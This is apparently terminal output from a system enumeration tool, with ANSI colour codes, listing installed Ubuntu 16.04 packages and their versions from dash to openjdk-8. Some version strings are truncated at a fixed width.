[36mdash[39m version [34m0.5.8-2.1ubuntu2[39m
[36mdbus[39m version [34m1.10.6-1ubuntu3.5[39m
[36mdconf-gsettings-backend:am[39m version [34m0.24.0-2[39m
[36mdconf-service[39m version [34m0.24.0-2[39m
[36mdebconf[39m version [34m1.5.58ubuntu2[39m
[36mdebconf-i18n[39m version [34m1.5.58ubuntu2[39m
[36mdebianutils[39m version [34m4.7[39m
[36mdefault-jdk[39m version [34m2:1.8-56ubuntu2[39m
[36mdefault-jdk-headless[39m version [34m2:1.8-56ubuntu2[39m
[36mdefault-jre[39m version [34m2:1.8-56ubuntu2[39m
[36mdefault-jre-headless[39m version [34m2:1.8-56ubuntu2[39m
[36mdh-python[39m version [34m2.20151103ubuntu1.[39m
[36mdictionaries-common[39m version [34m1.26.3[39m
[36mdiffutils[39m version [34m1:3.3-3[39m
[36mdistro-info-data[39m version [34m0.28ubuntu0.13[39m
[36mdmidecode[39m version [34m3.0-2ubuntu0.2[39m
[36mdns-root-data[39m version [34m201801300116.04.1[39m
[36mdnsmasq[39m version [34m2.75-1ubuntu0.16.0[39m
[36mdnsmasq-base[39m version [34m2.75-1ubuntu0.16.0[39m
[36mdnsutils[39m version [34m1:9.10.3.dfsg.P4-8[39m
[36mdosfstools[39m version [34m3.0.28-2ubuntu0.1[39m
[36mdpkg[39m version [34m1.18.4ubuntu1.6[39m
[36me2fslibs:amd64[39m version [34m1.42.13-1ubuntu1.2[39m
[36me2fsprogs[39m version [34m1.42.13-1ubuntu1.2[39m
[36med[39m version [34m1.10-2[39m
[36meject[39m version [34m2.1.5+deb1+cvs2008[39m
[36memacsen-common[39m version [34m2.0.8[39m
[36mfile[39m version [34m1:5.25-2ubuntu1.3[39m
[36mfindutils[39m version [34m4.6.0+git+20160126[39m
[36mfontconfig[39m version [34m2.11.94-0ubuntu1.1[39m
[36mfontconfig-config[39m version [34m2.11.94-0ubuntu1.1[39m
[36mfonts-dejavu-core[39m version [34m2.35-1[39m
[36mfonts-dejavu-extra[39m version [34m2.35-1[39m
[36mfriendly-recovery[39m version [34m0.2.31ubuntu2.1[39m
[36mftp[39m version [34m0.17-33[39m
[36mfuse[39m version [34m2.9.4-1ubuntu3.1[39m
[36mgcc-5-base:amd64[39m version [34m5.4.0-6ubuntu116.[39m
[36mgcc-6-base:amd64[39m version [34m6.0.1-0ubuntu1[39m
[36mgeoip-database[39m version [34m20160408-1[39m
[36mgettext-base[39m version [34m0.19.7-2ubuntu3.1[39m
[36mgir1.2-glib-2.0:amd64[39m version [34m1.46.0-3ubuntu1[39m
[36mglib-networking:amd64[39m version [34m2.48.2-1ubuntu16.[39m
[36mglib-networking-common[39m version [34m2.48.2-1ubuntu16.[39m
[36mglib-networking-services[39m version [34m2.48.2-1ubuntu16.[39m
[36mgnupg[39m version [34m1.4.20-1ubuntu3.3[39m
[36mgpgv[39m version [34m1.4.20-1ubuntu3.3[39m
[36mgrep[39m version [34m2.25-116.04.1[39m
[36mgroff-base[39m version [34m1.22.3-7[39m
[36mgrub-common[39m version [34m2.02beta2-36ubunt[39m
[36mgrub-gfxpayload-lists[39m version [34m0.7[39m
[36mgrub-pc[39m version [34m2.02beta2-36ubunt[39m
[36mgrub-pc-bin[39m version [34m2.02beta2-36ubunt[39m
[36mgrub2-common[39m version [34m2.02beta2-36ubunt[39m
[36mgsettings-desktop-schemas[39m version [34m3.18.1-1ubuntu1[39m
[36mgzip[39m version [34m1.6-4ubuntu1[39m
[36mhdparm[39m version [34m9.48+ds-1ubuntu0.1[39m
[36mhicolor-icon-theme[39m version [34m0.15-0ubuntu1.1[39m
[36mhostname[39m version [34m3.16ubuntu2[39m
[36mhumanity-icon-theme[39m version [34m0.6.10.1[39m
[36mifupdown[39m version [34m0.8.10ubuntu1.4[39m
[36minfo[39m version [34m6.1.0.dfsg.1-5[39m
[36minit[39m version [34m1.29ubuntu4[39m
[36minit-system-helpers[39m version [34m1.29ubuntu4[39m
[36minitramfs-tools[39m version [34m0.122ubuntu8.16[39m
[36minitramfs-tools-bin[39m version [34m0.122ubuntu8.16[39m
[36minitramfs-tools-core[39m version [34m0.122ubuntu8.16[39m
[36minitscripts[39m version [34m2.88dsf-59.3ubuntu[39m
[36minsserv[39m version [34m1.14.0-5ubuntu3[39m
[36minstall-info[39m version [34m6.1.0.dfsg.1-5[39m
[36minstallation-report[39m version [34m2.60ubuntu1[39m
[36mintel-microcode[39m version [34m3.20191115.1ubuntu[39m
[36miproute2[39m version [34m4.3.0-1ubuntu3.16.[39m
[36miptables[39m version [34m1.6.0-2ubuntu3[39m
[36miputils-ping[39m version [34m3:20121221-5ubuntu[39m
[36miputils-tracepath[39m version [34m3:20121221-5ubuntu[39m
[36mirqbalance[39m version [34m1.1.0-2ubuntu1[39m
[36misc-dhcp-client[39m version [34m4.3.3-5ubuntu12.10[39m
[36misc-dhcp-common[39m version [34m4.3.3-5ubuntu12.10[39m
[36miso-codes[39m version [34m3.65-1[39m
[36miucode-tool[39m version [34m1.5.1-1ubuntu0.1[39m
[36miw[39m version [34m3.17-1[39m
[36mjava-common[39m version [34m0.56ubuntu2[39m
[36mkbd[39m version [34m1.15.5-1ubuntu5[39m
[36mkeyboard-configuration[39m version [34m1.108ubuntu15.5[39m
[36mklibc-utils[39m version [34m2.0.4-8ubuntu1.16.[39m
[36mkmod[39m version [34m22-1ubuntu5.2[39m
[36mkrb5-locales[39m version [34m1.13.2+dfsg-5ubunt[39m
[36mlanguage-pack-en[39m version [34m1:16.04+20161009[39m
[36mlanguage-pack-en-base[39m version [34m1:16.04+20160627[39m
[36mlanguage-pack-gnome-en[39m version [34m1:16.04+20161009[39m
[36mlanguage-pack-gnome-en-bas[39m version [34m1:16.04+20160627[39m
[36mlanguage-selector-common[39m version [34m0.165.4[39m
[36mlaptop-detect[39m version [34m0.13.7ubuntu2[39m
[36mless[39m version [34m481-2.1ubuntu0.2[39m
[36mlibaccountsservice0:amd64[39m version [34m0.6.40-2ubuntu11.3[39m
[36mlibacl1:amd64[39m version [34m2.2.52-3[39m
[36mlibapparmor-perl[39m version [34m2.10.95-0ubuntu2.1[39m
[36mlibapparmor1:amd64[39m version [34m2.10.95-0ubuntu2.1[39m
[36mlibapt-inst2.0:amd64[39m version [34m1.2.32[39m
[36mlibapt-pkg5.0:amd64[39m version [34m1.2.32[39m
[36mlibasn1-8-heimdal:amd64[39m version [34m1.7git20150920+df[39m
[36mlibasound2:amd64[39m version [34m1.1.0-0ubuntu1[39m
[36mlibasound2-data[39m version [34m1.1.0-0ubuntu1[39m
[36mlibasprintf0v5:amd64[39m version [34m0.19.7-2ubuntu3.1[39m
[36mlibasyncns0:amd64[39m version [34m0.8-5build1[39m
[36mlibatk-bridge2.0-0:amd64[39m version [34m2.18.1-2ubuntu1[39m
[36mlibatk1.0-0:amd64[39m version [34m2.18.0-1[39m
[36mlibatk1.0-data[39m version [34m2.18.0-1[39m
[36mlibatkmm-1.6-1v5:amd64[39m version [34m2.24.2-1[39m
[36mlibatm1:amd64[39m version [34m1:2.5.1-1.5[39m
[36mlibatspi2.0-0:amd64[39m version [34m2.18.3-4ubuntu1[39m
[36mlibattr1:amd64[39m version [34m1:2.4.47-2[39m
[36mlibaudit-common[39m version [34m1:2.4.5-1ubuntu2.1[39m
[36mlibaudit1:amd64[39m version [34m1:2.4.5-1ubuntu2.1[39m
[36mlibavahi-client3:amd64[39m version [34m0.6.32rc+dfsg-1ub[39m
[36mlibavahi-common-data:amd64[39m version [34m0.6.32rc+dfsg-1ub[39m
[36mlibavahi-common3:amd64[39m version [34m0.6.32rc+dfsg-1ub[39m
[36mlibbind9-140:amd64[39m version [34m1:9.10.3.dfsg.P4-8[39m
[36mlibblkid1:amd64[39m version [34m2.27.1-6ubuntu3.10[39m
[36mlibboost-filesystem1.58.0:[39m version [34m1.58.0+dfsg-5ubunt[39m
[36mlibboost-system1.58.0:amd6[39m version [34m1.58.0+dfsg-5ubunt[39m
[36mlibbsd0:amd64[39m version [34m0.8.2-1ubuntu0.1[39m
[36mlibbz2-1.0:amd64[39m version [34m1.0.6-8ubuntu0.2[39m
[36mlibc-bin[39m version [34m2.23-0ubuntu11[39m
[36mlibc6:amd64[39m version [34m2.23-0ubuntu11[39m
[36mlibcairo-gobject2:amd64[39m version [34m1.14.6-1[39m
[36mlibcairo2:amd64[39m version [34m1.14.6-1[39m
[36mlibcairomm-1.0-1v5:amd64[39m version [34m1.12.0-1[39m
[36mlibcap-ng0:amd64[39m version [34m0.7.7-1[39m
[36mlibcap2:amd64[39m version [34m1:2.24-12[39m
[36mlibcap2-bin[39m version [34m1:2.24-12[39m
[36mlibcapnp-0.5.3:amd64[39m version [34m0.5.3-2ubuntu1.1[39m
[36mlibcolord2:amd64[39m version [34m1.2.12-1ubuntu1[39m
[36mlibcomerr2:amd64[39m version [34m1.42.13-1ubuntu1.2[39m
[36mlibcroco3:amd64[39m version [34m0.6.11-1[39m
[36mlibcryptsetup4:amd64[39m version [34m2:1.6.6-5ubuntu2.1[39m
[36mlibcups2:amd64[39m version [34m2.1.3-4ubuntu0.10[39m
[36mlibcurl3-gnutls:amd64[39m version [34m7.47.0-1ubuntu2.14[39m
[36mlibdatrie1:amd64[39m version [34m0.2.10-2[39m
[36mlibdb5.3:amd64[39m version [34m5.3.28-11ubuntu0.2[39m
[36mlibdbus-1-3:amd64[39m version [34m1.10.6-1ubuntu3.5[39m
[36mlibdbus-glib-1-2:amd64[39m version [34m0.106-1[39m
[36mlibdconf1:amd64[39m version [34m0.24.0-2[39m
[36mlibdebconfclient0:amd64[39m version [34m0.198ubuntu1[39m
[36mlibdevmapper1.02.1:amd64[39m version [34m2:1.02.110-1ubuntu[39m
[36mlibdns-export162[39m version [34m1:9.10.3.dfsg.P4-8[39m
[36mlibdns162:amd64[39m version [34m1:9.10.3.dfsg.P4-8[39m
[36mlibdrm-amdgpu1:amd64[39m version [34m2.4.91-216.04.1[39m
[36mlibdrm-common[39m version [34m2.4.91-216.04.1[39m
[36mlibdrm-intel1:amd64[39m version [34m2.4.91-216.04.1[39m
[36mlibdrm-nouveau2:amd64[39m version [34m2.4.91-216.04.1[39m
[36mlibdrm-radeon1:amd64[39m version [34m2.4.91-216.04.1[39m
[36mlibdrm2:amd64[39m version [34m2.4.91-216.04.1[39m
[36mlibdumbnet1:amd64[39m version [34m1.12-7[39m
[36mlibedit2:amd64[39m version [34m3.1-20150325-1ubun[39m
[36mlibegl1-mesa:amd64[39m version [34m18.0.5-0ubuntu016[39m
[36mlibelf1:amd64[39m version [34m0.165-3ubuntu1.2[39m
[36mlibepoxy0:amd64[39m version [34m1.3.1-1ubuntu0.16.[39m
[36mlibestr0[39m version [34m0.1.10-1[39m
[36mlibexpat1:amd64[39m version [34m2.1.0-7ubuntu0.16.[39m
[36mlibfdisk1:amd64[39m version [34m2.27.1-6ubuntu3.10[39m
[36mlibffi6:amd64[39m version [34m3.2.1-4[39m
[36mlibflac8:amd64[39m version [34m1.3.1-4[39m
[36mlibfontconfig1:amd64[39m version [34m2.11.94-0ubuntu1.1[39m
[36mlibfreetype6:amd64[39m version [34m2.6.1-0.1ubuntu2.4[39m
[36mlibfribidi0:amd64[39m version [34m0.19.7-1[39m
[36mlibfuse2:amd64[39m version [34m2.9.4-1ubuntu3.1[39m
[36mlibgbm1:amd64[39m version [34m18.0.5-0ubuntu016[39m
[36mlibgcc1:amd64[39m version [34m1:6.0.1-0ubuntu1[39m
[36mlibgcrypt20:amd64[39m version [34m1.6.5-2ubuntu0.6[39m
[36mlibgdbm3:amd64[39m version [34m1.8.3-13.1[39m
[36mlibgdk-pixbuf2.0-0:amd64[39m version [34m2.32.2-1ubuntu1.6[39m
[36mlibgdk-pixbuf2.0-common[39m version [34m2.32.2-1ubuntu1.6[39m
[36mlibgeoip1:amd64[39m version [34m1.6.9-1[39m
[36mlibgif7:amd64[39m version [34m5.1.4-0.316.04.1[39m
[36mlibgirepository-1.0-1:amd6[39m version [34m1.46.0-3ubuntu1[39m
[36mlibgl1-mesa-dri:amd64[39m version [34m18.0.5-0ubuntu016[39m
[36mlibgl1-mesa-glx:amd64[39m version [34m18.0.5-0ubuntu016[39m
[36mlibglapi-mesa:amd64[39m version [34m18.0.5-0ubuntu016[39m
[36mlibglib2.0-0:amd64[39m version [34m2.48.2-0ubuntu4.4[39m
[36mlibglib2.0-data[39m version [34m2.48.2-0ubuntu4.4[39m
[36mlibglibmm-2.4-1v5:amd64[39m version [34m2.46.3-1[39m
[36mlibgmp10:amd64[39m version [34m2:6.1.0+dfsg-2[39m
[36mlibgnutls-openssl27:amd64[39m version [34m3.4.10-4ubuntu1.7[39m
[36mlibgnutls30:amd64[39m version [34m3.4.10-4ubuntu1.7[39m
[36mlibgpg-error0:amd64[39m version [34m1.21-2ubuntu1[39m
[36mlibgraphite2-3:amd64[39m version [34m1.3.10-0ubuntu0.16[39m
[36mlibgssapi-krb5-2:amd64[39m version [34m1.13.2+dfsg-5ubunt[39m
[36mlibgssapi3-heimdal:amd64[39m version [34m1.7git20150920+df[39m
[36mlibgtk-3-0:amd64[39m version [34m3.18.9-1ubuntu3.3[39m
[36mlibgtk-3-bin[39m version [34m3.18.9-1ubuntu3.3[39m
[36mlibgtk-3-common[39m version [34m3.18.9-1ubuntu3.3[39m
[36mlibgtk2.0-0:amd64[39m version [34m2.24.30-1ubuntu1.1[39m
[36mlibgtk2.0-bin[39m version [34m2.24.30-1ubuntu1.1[39m
[36mlibgtk2.0-common[39m version [34m2.24.30-1ubuntu1.1[39m
[36mlibgtkmm-3.0-1v5:amd64[39m version [34m3.18.0-1[39m
[36mlibharfbuzz0b:amd64[39m version [34m1.0.1-1ubuntu0.1[39m
[36mlibhcrypto4-heimdal:amd64[39m version [34m1.7git20150920+df[39m
[36mlibheimbase1-heimdal:amd64[39m version [34m1.7git20150920+df[39m
[36mlibheimntlm0-heimdal:amd64[39m version [34m1.7git20150920+df[39m
[36mlibhogweed4:amd64[39m version [34m3.2-1ubuntu0.16.04[39m
[36mlibhx509-5-heimdal:amd64[39m version [34m1.7git20150920+df[39m
[36mlibice-dev:amd64[39m version [34m2:1.0.9-1[39m
[36mlibice6:amd64[39m version [34m2:1.0.9-1[39m
[36mlibicu55:amd64[39m version [34m55.1-7ubuntu0.4[39m
[36mlibidn11:amd64[39m version [34m1.32-3ubuntu1.2[39m
[36mlibisc-export160[39m version [34m1:9.10.3.dfsg.P4-8[39m
[36mlibisc160:amd64[39m version [34m1:9.10.3.dfsg.P4-8[39m
[36mlibisccc140:amd64[39m version [34m1:9.10.3.dfsg.P4-8[39m
[36mlibisccfg140:amd64[39m version [34m1:9.10.3.dfsg.P4-8[39m
[36mlibjbig0:amd64[39m version [34m2.1-3.1[39m
[36mlibjpeg-turbo8:amd64[39m version [34m1.4.2-0ubuntu3.3[39m
[36mlibjpeg8:amd64[39m version [34m8c-2ubuntu8[39m
[36mlibjson-c2:amd64[39m version [34m0.11-4ubuntu2[39m
[36mlibjson-glib-1.0-0:amd64[39m version [34m1.1.2-0ubuntu1[39m
[36mlibjson-glib-1.0-common[39m version [34m1.1.2-0ubuntu1[39m
[36mlibk5crypto3:amd64[39m version [34m1.13.2+dfsg-5ubunt[39m
[36mlibkeyutils1:amd64[39m version [34m1.5.9-8ubuntu1[39m
[36mlibklibc[39m version [34m2.0.4-8ubuntu1.16.[39m
[36mlibkmod2:amd64[39m version [34m22-1ubuntu5.2[39m
[36mlibkrb5-26-heimdal:amd64[39m version [34m1.7git20150920+df[39m
[36mlibkrb5-3:amd64[39m version [34m1.13.2+dfsg-5ubunt[39m
[36mlibkrb5support0:amd64[39m version [34m1.13.2+dfsg-5ubunt[39m
[36mliblcms2-2:amd64[39m version [34m2.6-3ubuntu2.1[39m
[36mlibldap-2.4-2:amd64[39m version [34m2.4.42+dfsg-2ubunt[39m
[36mlibllvm6.0:amd64[39m version [34m1:6.0-1ubuntu216.[39m
[36mliblocale-gettext-perl[39m version [34m1.07-1build1[39m
[36mliblwres141:amd64[39m version [34m1:9.10.3.dfsg.P4-8[39m
[36mliblz4-1:amd64[39m version [34m0.0r131-2ubuntu2[39m
[36mliblzma5:amd64[39m version [34m5.1.1alpha+2012061[39m
[36mlibmagic1:amd64[39m version [34m1:5.25-2ubuntu1.3[39m
[36mlibmirclient9:amd64[39m version [34m0.26.3+16.04.20170[39m
[36mlibmircommon7:amd64[39m version [34m0.26.3+16.04.20170[39m
[36mlibmircore1:amd64[39m version [34m0.26.3+16.04.20170[39m
[36mlibmirprotobuf3:amd64[39m version [34m0.26.3+16.04.20170[39m
[36mlibmnl0:amd64[39m version [34m1.0.3-5[39m
[36mlibmount1:amd64[39m version [34m2.27.1-6ubuntu3.10[39m
[36mlibmpdec2:amd64[39m version [34m2.4.2-1[39m
[36mlibmspack0:amd64[39m version [34m0.5-1ubuntu0.16.04[39m
[36mlibncurses5:amd64[39m version [34m6.0+20160213-1ubun[39m
[36mlibncursesw5:amd64[39m version [34m6.0+20160213-1ubun[39m
[36mlibnetfilter-conntrack3:am[39m version [34m1.0.5-1[39m
[36mlibnettle6:amd64[39m version [34m3.2-1ubuntu0.16.04[39m
[36mlibnewt0.52:amd64[39m version [34m0.52.18-1ubuntu2[39m
[36mlibnfnetlink0:amd64[39m version [34m1.0.1-3[39m
[36mlibnih1:amd64[39m version [34m1.0.3-4.3ubuntu1[39m
[36mlibnl-3-200:amd64[39m version [34m3.2.27-1ubuntu0.16[39m
[36mlibnl-genl-3-200:amd64[39m version [34m3.2.27-1ubuntu0.16[39m
[36mlibnspr4:amd64[39m version [34m2:4.13.1-0ubuntu0.[39m
[36mlibnss3:amd64[39m version [34m2:3.28.4-0ubuntu0.[39m
[36mlibnss3-nssdb[39m version [34m2:3.28.4-0ubuntu0.[39m
[36mlibnuma1:amd64[39m version [34m2.0.11-1ubuntu1.1[39m
[36mlibogg0:amd64[39m version [34m1.3.2-1[39m
[36mlibp11-kit0:amd64[39m version [34m0.23.2-5ubuntu16.[39m
[36mlibpam-modules:amd64[39m version [34m1.1.8-3.2ubuntu2.1[39m
[36mlibpam-modules-bin[39m version [34m1.1.8-3.2ubuntu2.1[39m
[36mlibpam-runtime[39m version [34m1.1.8-3.2ubuntu2.1[39m
[36mlibpam-systemd:amd64[39m version [34m229-4ubuntu21.27[39m
[36mlibpam0g:amd64[39m version [34m1.1.8-3.2ubuntu2.1[39m
[36mlibpango-1.0-0:amd64[39m version [34m1.38.1-1[39m
[36mlibpangocairo-1.0-0:amd64[39m version [34m1.38.1-1[39m
[36mlibpangoft2-1.0-0:amd64[39m version [34m1.38.1-1[39m
[36mlibpangomm-1.4-1v5:amd64[39m version [34m2.38.1-1[39m
[36mlibparted2:amd64[39m version [34m3.2-15ubuntu0.1[39m
[36mlibpcap0.8:amd64[39m version [34m1.7.4-2ubuntu0.1[39m
[36mlibpci3:amd64[39m version [34m1:3.3.1-1.1ubuntu1[39m
[36mlibpciaccess0:amd64[39m version [34m0.13.4-1[39m
[36mlibpcre3:amd64[39m version [34m2:8.38-3.1[39m
[36mlibpcsclite1:amd64[39m version [34m1.8.14-1ubuntu1.16[39m
[36mlibpipeline1:amd64[39m version [34m1.4.1-2[39m
[36mlibpixman-1-0:amd64[39m version [34m0.33.6-1[39m
[36mlibplymouth4:amd64[39m version [34m0.9.2-3ubuntu13.5[39m
[36mlibpng12-0:amd64[39m version [34m1.2.54-1ubuntu1.1[39m
[36mlibpolkit-gobject-1-0:amd6[39m version [34m0.105-14.1ubuntu0.[39m
[36mlibpopt0:amd64[39m version [34m1.16-10[39m
[36mlibprocps4:amd64[39m version [34m2:3.3.10-4ubuntu2.[39m
[36mlibprotobuf-lite9v5:amd64[39m version [34m2.6.1-1.3[39m
[36mlibproxy1v5:amd64[39m version [34m0.4.11-5ubuntu1[39m
[36mlibpthread-stubs0-dev:amd6[39m version [34m0.3-4[39m
[36mlibpulse0:amd64[39m version [34m1:8.0-0ubuntu3.10[39m
[36mlibpython3-stdlib:amd64[39m version [34m3.5.1-3[39m
[36mlibpython3.5-minimal:amd64[39m version [34m3.5.2-2ubuntu016.[39m
[36mlibpython3.5-stdlib:amd64[39m version [34m3.5.2-2ubuntu016.[39m
[36mlibreadline6:amd64[39m version [34m6.3-8ubuntu2[39m
[36mlibrest-0.7-0:amd64[39m version [34m0.7.93-1[39m
[36mlibroken18-heimdal:amd64[39m version [34m1.7git20150920+df[39m
[36mlibrsvg2-2:amd64[39m version [34m2.40.13-3[39m
[36mlibrsvg2-common:amd64[39m version [34m2.40.13-3[39m
[36mlibrtmp1:amd64[39m version [34m2.4+20151223.gitfa[39m
[36mlibsasl2-2:amd64[39m version [34m2.1.26.dfsg1-14ubu[39m
[36mlibsasl2-modules:amd64[39m version [34m2.1.26.dfsg1-14ubu[39m
[36mlibsasl2-modules-db:amd64[39m version [34m2.1.26.dfsg1-14ubu[39m
[36mlibseccomp2:amd64[39m version [34m2.4.1-0ubuntu0.16.[39m
[36mlibselinux1:amd64[39m version [34m2.4-3build2[39m
[36mlibsemanage-common[39m version [34m2.3-1build3[39m
[36mlibsemanage1:amd64[39m version [34m2.3-1build3[39m
[36mlibsensors4:amd64[39m version [34m1:3.4.0-2[39m
[36mlibsepol1:amd64[39m version [34m2.4-2[39m
[36mlibsigc++-2.0-0v5:amd64[39m version [34m2.6.2-1[39m
[36mlibslang2:amd64[39m version [34m2.3.0-2ubuntu1.1[39m
[36mlibsm-dev:amd64[39m version [34m2:1.2.2-1[39m
[36mlibsm6:amd64[39m version [34m2:1.2.2-1[39m
[36mlibsmartcols1:amd64[39m version [34m2.27.1-6ubuntu3.10[39m
[36mlibsndfile1:amd64[39m version [34m1.0.25-10ubuntu0.1[39m
[36mlibsoup-gnome2.4-1:amd64[39m version [34m2.52.2-1ubuntu0.3[39m
[36mlibsoup2.4-1:amd64[39m version [34m2.52.2-1ubuntu0.3[39m
[36mlibsqlite3-0:amd64[39m version [34m3.11.0-1ubuntu1.4[39m
[36mlibss2:amd64[39m version [34m1.42.13-1ubuntu1.2[39m
[36mlibssl1.0.0:amd64[39m version [34m1.0.2g-1ubuntu4.15[39m
[36mlibstdc++6:amd64[39m version [34m5.4.0-6ubuntu116.[39m
[36mlibsystemd0:amd64[39m version [34m229-4ubuntu21.27[39m
[36mlibtasn1-6:amd64[39m version [34m4.7-3ubuntu0.16.04[39m
[36mlibtext-charwidth-perl[39m version [34m0.04-7build5[39m
[36mlibtext-iconv-perl[39m version [34m1.7-5build4[39m
[36mlibtext-wrapi18n-perl[39m version [34m0.06-7.1[39m
[36mlibthai-data[39m version [34m0.1.24-2[39m
[36mlibthai0:amd64[39m version [34m0.1.24-2[39m
[36mlibtiff5:amd64[39m version [34m4.0.6-1ubuntu0.7[39m
[36mlibtinfo5:amd64[39m version [34m6.0+20160213-1ubun[39m
[36mlibudev1:amd64[39m version [34m229-4ubuntu21.27[39m
[36mlibusb-0.1-4:amd64[39m version [34m2:0.1.12-28[39m
[36mlibusb-1.0-0:amd64[39m version [34m2:1.0.20-1[39m
[36mlibustr-1.0-1:amd64[39m version [34m1.0.4-5[39m
[36mlibuuid1:amd64[39m version [34m2.27.1-6ubuntu3.10[39m
[36mlibvorbis0a:amd64[39m version [34m1.3.5-3ubuntu0.2[39m
[36mlibvorbisenc2:amd64[39m version [34m1.3.5-3ubuntu0.2[39m
[36mlibwayland-client0:amd64[39m version [34m1.12.0-1ubuntu16.[39m
[36mlibwayland-cursor0:amd64[39m version [34m1.12.0-1ubuntu16.[39m
[36mlibwayland-egl1-mesa:amd64[39m version [34m18.0.5-0ubuntu016[39m
[36mlibwayland-server0:amd64[39m version [34m1.12.0-1ubuntu16.[39m
[36mlibwind0-heimdal:amd64[39m version [34m1.7git20150920+df[39m
[36mlibwrap0:amd64[39m version [34m7.6.q-25[39m
[36mlibx11-6:amd64[39m version [34m2:1.6.3-1ubuntu2.1[39m
[36mlibx11-data[39m version [34m2:1.6.3-1ubuntu2.1[39m
[36mlibx11-dev:amd64[39m version [34m2:1.6.3-1ubuntu2.1[39m
[36mlibx11-doc[39m version [34m2:1.6.3-1ubuntu2.1[39m
[36mlibx11-xcb1:amd64[39m version [34m2:1.6.3-1ubuntu2.1[39m
[36mlibxau-dev:amd64[39m version [34m1:1.0.8-1[39m
[36mlibxau6:amd64[39m version [34m1:1.0.8-1[39m
[36mlibxcb-dri2-0:amd64[39m version [34m1.11.1-1ubuntu1[39m
[36mlibxcb-dri3-0:amd64[39m version [34m1.11.1-1ubuntu1[39m
[36mlibxcb-glx0:amd64[39m version [34m1.11.1-1ubuntu1[39m
[36mlibxcb-present0:amd64[39m version [34m1.11.1-1ubuntu1[39m
[36mlibxcb-render0:amd64[39m version [34m1.11.1-1ubuntu1[39m
[36mlibxcb-shm0:amd64[39m version [34m1.11.1-1ubuntu1[39m
[36mlibxcb-sync1:amd64[39m version [34m1.11.1-1ubuntu1[39m
[36mlibxcb-xfixes0:amd64[39m version [34m1.11.1-1ubuntu1[39m
[36mlibxcb1:amd64[39m version [34m1.11.1-1ubuntu1[39m
[36mlibxcb1-dev:amd64[39m version [34m1.11.1-1ubuntu1[39m
[36mlibxcomposite1:amd64[39m version [34m1:0.4.4-1[39m
[36mlibxcursor1:amd64[39m version [34m1:1.1.14-1ubuntu0.[39m
[36mlibxdamage1:amd64[39m version [34m1:1.1.4-2[39m
[36mlibxdmcp-dev:amd64[39m version [34m1:1.1.2-1.1[39m
[36mlibxdmcp6:amd64[39m version [34m1:1.1.2-1.1[39m
[36mlibxext6:amd64[39m version [34m2:1.3.3-1[39m
[36mlibxfixes3:amd64[39m version [34m1:5.0.1-2[39m
[36mlibxi6:amd64[39m version [34m2:1.7.6-1[39m
[36mlibxinerama1:amd64[39m version [34m2:1.1.3-1[39m
[36mlibxkbcommon0:amd64[39m version [34m0.5.0-1ubuntu2.1[39m
[36mlibxml2:amd64[39m version [34m2.9.3+dfsg1-1ubunt[39m
[36mlibxmlsec1[39m version [34m1.2.20-2ubuntu4[39m
[36mlibxmlsec1-openssl[39m version [34m1.2.20-2ubuntu4[39m
[36mlibxmuu1:amd64[39m version [34m2:1.1.2-2[39m
[36mlibxrandr2:amd64[39m version [34m2:1.5.0-1[39m
[36mlibxrender1:amd64[39m version [34m1:0.9.9-0ubuntu1[39m
[36mlibxshmfence1:amd64[39m version [34m1.2-1[39m
[36mlibxslt1.1:amd64[39m version [34m1.1.28-2.1ubuntu0.[39m
[36mlibxt-dev:amd64[39m version [34m1:1.1.5-0ubuntu1[39m
[36mlibxt6:amd64[39m version [34m1:1.1.5-0ubuntu1[39m
[36mlibxtables11:amd64[39m version [34m1.6.0-2ubuntu3[39m
[36mlibxtst6:amd64[39m version [34m2:1.2.2-1[39m
[36mlibxxf86vm1:amd64[39m version [34m1:1.1.4-1[39m
[36mlinux-base[39m version [34m4.5ubuntu116.04.1[39m
[36mlinux-firmware[39m version [34m1.157.22[39m
[36mlinux-generic[39m version [34m4.4.0.174.182[39m
[36mlinux-headers-4.4.0-142[39m version [34m4.4.0-142.168[39m
[36mlinux-headers-4.4.0-142-ge[39m version [34m4.4.0-142.168[39m
[36mlinux-headers-4.4.0-174[39m version [34m4.4.0-174.204[39m
[36mlinux-headers-4.4.0-174-ge[39m version [34m4.4.0-174.204[39m
[36mlinux-headers-generic[39m version [34m4.4.0.174.182[39m
[36mlinux-image-4.4.0-142-gene[39m version [34m4.4.0-142.168[39m
[36mlinux-image-4.4.0-174-gene[39m version [34m4.4.0-174.204[39m
[36mlinux-image-extra-4.4.0-14[39m version [34m4.4.0-142.168[39m
[36mlinux-image-generic[39m version [34m4.4.0.174.182[39m
[36mlinux-modules-4.4.0-174-ge[39m version [34m4.4.0-174.204[39m
[36mlinux-modules-extra-4.4.0-[39m version [34m4.4.0-174.204[39m
[36mlocales[39m version [34m2.23-0ubuntu11[39m
[36mlogin[39m version [34m1:4.2-3.1ubuntu5.4[39m
[36mlogrotate[39m version [34m3.8.7-2ubuntu2.16.[39m
[36mlsb-base[39m version [34m9.20160110ubuntu0.[39m
[36mlsb-release[39m version [34m9.20160110ubuntu0.[39m
[36mlshw[39m version [34m02.17-1.1ubuntu3.6[39m
[36mlsof[39m version [34m4.89+dfsg-0.1[39m
[36mltrace[39m version [34m0.7.3-5.1ubuntu4[39m
[36mmakedev[39m version [34m2.3.1-93ubuntu2ub[39m
[36mman-db[39m version [34m2.7.5-1[39m
[36mmanpages[39m version [34m4.04-2[39m
[36mmawk[39m version [34m1.3.3-17ubuntu2[39m
[36mmime-support[39m version [34m3.59ubuntu1[39m
[36mmlocate[39m version [34m0.26-1ubuntu2[39m
[36mmount[39m version [34m2.27.1-6ubuntu3.10[39m
[36mmtr-tiny[39m version [34m0.86-1ubuntu0.1[39m
[36mmultiarch-support[39m version [34m2.23-0ubuntu11[39m
[36mnano[39m version [34m2.5.3-2ubuntu2[39m
[36mncurses-base[39m version [34m6.0+20160213-1ubun[39m
[36mncurses-bin[39m version [34m6.0+20160213-1ubun[39m
[36mncurses-term[39m version [34m6.0+20160213-1ubun[39m
[36mnet-tools[39m version [34m1.60-26ubuntu1[39m
[36mnetbase[39m version [34m5.3[39m
[36mnetcat-openbsd[39m version [34m1.105-7ubuntu1[39m
[36mntfs-3g[39m version [34m1:2015.3.14AR.1-1u[39m
[36mopen-vm-tools[39m version [34m2:10.2.0-3ubuntu0[39m
[36mopen-vm-tools-desktop[39m version [34m2:10.2.0-3ubuntu0[39m
[36mopenjdk-8-jdk:amd64[39m version [34m8u242-b08-0ubuntu3[39m
[36mopenjdk-8-jdk-headless:amd[39m version [34m8u242-b08-0ubuntu3[39m
[36mopenjdk-8-jre:amd64[39m version [34m8u242-b08-0ubuntu3[39m
